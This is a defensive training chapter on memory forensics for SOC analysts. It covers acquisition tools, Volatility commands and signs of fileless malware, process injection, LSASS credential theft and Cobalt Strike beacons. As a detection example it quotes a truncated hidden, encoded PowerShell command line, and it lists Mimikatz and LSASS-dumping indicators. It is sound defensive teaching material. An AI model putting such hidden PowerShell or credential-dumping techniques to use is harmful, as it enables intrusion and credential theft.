Memory forensics is the process of analyzing the RAM (volatile memory) of an endpoint to uncover evidence of malicious activity that may not appear in logs or on disk.
It is essential for detecting fileless malware, in-memory implants, credential theft, process injection, rootkits, and advanced attacker techniques that EDR or SIEM may only partially capture.
This chapter explains memory forensics in full-depth SOC style, including acquisition, tools, artifacts, detection techniques, and practical investigation workflows.
Why Memory Forensics Matters in SOC
Attackers increasingly use fileless and in-memory techniques, meaning no malware file touches the disk.
Memory forensics reveals:
-
Process injections
-
Malicious threads inside legitimate processes
-
Cobalt Strike beacons
-
Reflective DLL loading
-
LSASS credential dumpers
-
Suspicious network connections
-
In-memory PowerShell
-
Obfuscated shellcode
-
Persistence artifacts loaded in RAM
Memory is the single most accurate source for detecting advanced intrusions.
What Lives in Memory (Practical Breakdown)
Memory contains:
-
All running processes
-
Loaded DLLs
-
Command-line arguments
-
Network connections
-
Registry keys cached by the OS
-
Encryption keys
-
Credentials
-
Malware payloads
-
Script engines (PowerShell, WMI, mshta)
-
Shellcode and injected threads
If an attacker is active, traces exist in RAM.
Memory Acquisition (SOC Techniques)
Before analyzing memory, you must acquire it from the system.
Common tools:
-
FTK Imager
-
Magnet RAM Capture
-
Belkasoft RAM Capturer
-
WinPMEM
-
DumpIt
-
AVML (Linux)
Requirements:
-
Acquire in raw
.rawor.memformat -
Use trusted acquisition methods
-
Perform acquisition before system reboot
-
Store dump on isolated media
-
Hash the dump (MD5/SHA256) for integrity
Example workflow:
dumpit.exe → creates memorydump.mem → analyst extracts artifacts
Analysis Tools Used in SOC & DFIR
Volatility (most widely used)
Supports Windows, Linux, macOS.
Rekall
Memory analysis framework created by Google.
Redline
Lightweight memory + system triage tool.
EDR Memory Snapshots
Some EDRs (CrowdStrike, SentinelOne) provide built-in memory snapshots.
Core Memory Forensics Techniques (SOC Focus)
Below are the essential methods analysts use.
1. Process Enumeration
Identify all processes with:
volatility -f memdump.mem pslist
volatility -f memdump.mem pstree
Analysts check for:
-
Unknown processes
-
Suspicious parent-child chains
-
Signed vs unsigned executables
-
High-privilege processes spawning unexpected children
Example:
powershell.exe running under WINWORD.exe
2. Detecting Process Injection
Attackers inject malicious threads into legitimate processes.
Indicators:
-
Suspicious memory regions
-
RWX (Read-Write-Execute) pages
-
Threads pointing to unknown memory areas
-
In-memory only DLLs
Volatility commands:
malfind
ldrmodules
handles
Suspicious example:
Injected code inside explorer.exe, no backing file
3. LSASS Credential Dump Detection
LSASS memory contains credentials; attackers target it.
Indicators:
-
Unknown process accessing LSASS
-
Mimikatz strings
-
Unusual handles
-
Suspicious threads
Volatility:
handles -p lsass.exe
malfind -p lsass.exe
If memory shows Mimikatz artifacts → high-severity breach.
4. Detecting Cobalt Strike & RATs in Memory
Common indicators:
-
Encrypted beacon configuration
-
Jitter patterns
-
Pipe names
-
Injected threads in:
-
explorer.exe -
svchost.exe -
dllhost.exe -
rundll32.exe
-
Volatility:
psxview
malfind
netscan
Example finding:
Injected beacon thread in dllhost.exe
5. Script-Based Malware Analysis (PowerShell / wscript)
Fileless malware often leaves script content in memory.
Volatility:
cmdline
consoles
Detect:
-
Deobfuscated PowerShell commands
-
Base64 strings
-
Malicious VBA artifacts
Example:
powershell -nop -w hidden -enc JAB...
6. Network Connection Analysis
Volatility:
netscan
Identify:
-
Outbound C2 connections
-
Unusual ports
-
Suspicious remote IPs
-
Processes making connections
Example:
svchost.exe → 91.22.113.10:443
If svchost is making foreign outbound traffic → highly suspicious.
7. DLL and Module Verification
Attackers load malicious DLLs into memory.
Volatility:
dlllist
ldrmodules
Check:
-
Missing DLL signatures
-
Unbacked DLLs
-
DLLs in non-standard paths
Example:
C:\Users\Public\update.dll loaded inside explorer.exe
8. Detecting Persistence Artifacts
Memory reveals:
-
Registry keys
-
WMI subscriptions
-
Scheduled tasks
-
Autorun programs
Volatility:
printkey
svcscan
wmiobj
Example:
WMI permanent event subscription calling malicious script
9. Extracting Malware From Memory
Analysts dump samples for sandbox analysis.
Volatility:
memdump
procdump
You can extract:
-
Payloads
-
Stagers
-
Injected DLLs
-
Shellcode
Example:
Extract payload.exe for Hybrid-Analysis
Memory Forensics Workflow (SOC Standard)
A typical workflow:
Step 1 — Acquire memory
Create .mem or .raw dump.
Step 2 — Identify suspicious processes
Use pslist, pstree.
Step 3 — Analyze injected processes
Use malfind.
Step 4 — Examine network activity
Use netscan.
Step 5 — Extract suspicious artifacts
Use procdump, yarascan.
Step 6 — Perform IOC enrichment
Validate hashes, domains, IPs.
Step 7 — Map behaviors to MITRE ATT&CK
Example:
-
T1055 (Process Injection)
-
T1003 (Credential Access)
-
T1105 (Ingress Tool Transfer)
Step 8 — Write IR recommendations
Containment, eradication, investigation.
Practical Memory Forensics Examples
Example 1 — Detecting Fileless Malware
malfind → RWX memory region in powershell.exe
netscan → outbound to C2
cmdline → encoded command found
Conclusion: PowerShell-based implant.
Example 2 — Detecting Cobalt Strike
dllhost.exe with injected thread
netscan → beacon pattern
yarascan → matches cobalt beacon signatures
High-severity intrusion.
Example 3 — Detecting Credential Theft
procdump lsass.exe artifacts
strings show "mimikatz"
Immediate containment required.
Example 4 — Detecting Crypto Miner
xmrig in memory
high CPU usage
outbound to mining pool
Confirms infection even if binary deleted.
Intel Dump
-
Memory forensics identifies fileless malware, injections, C2 beacons, and credential theft.
-
Tools include Volatility, Rekall, Redline, and EDR snapshots.
-
Analysts examine processes, DLLs, network connections, injected code, and PowerShell commands.
-
Memory reveals artifacts not present on disk or logs.
-
Use memory analysis to extract malware, map MITRE techniques, and confirm advanced intrusions.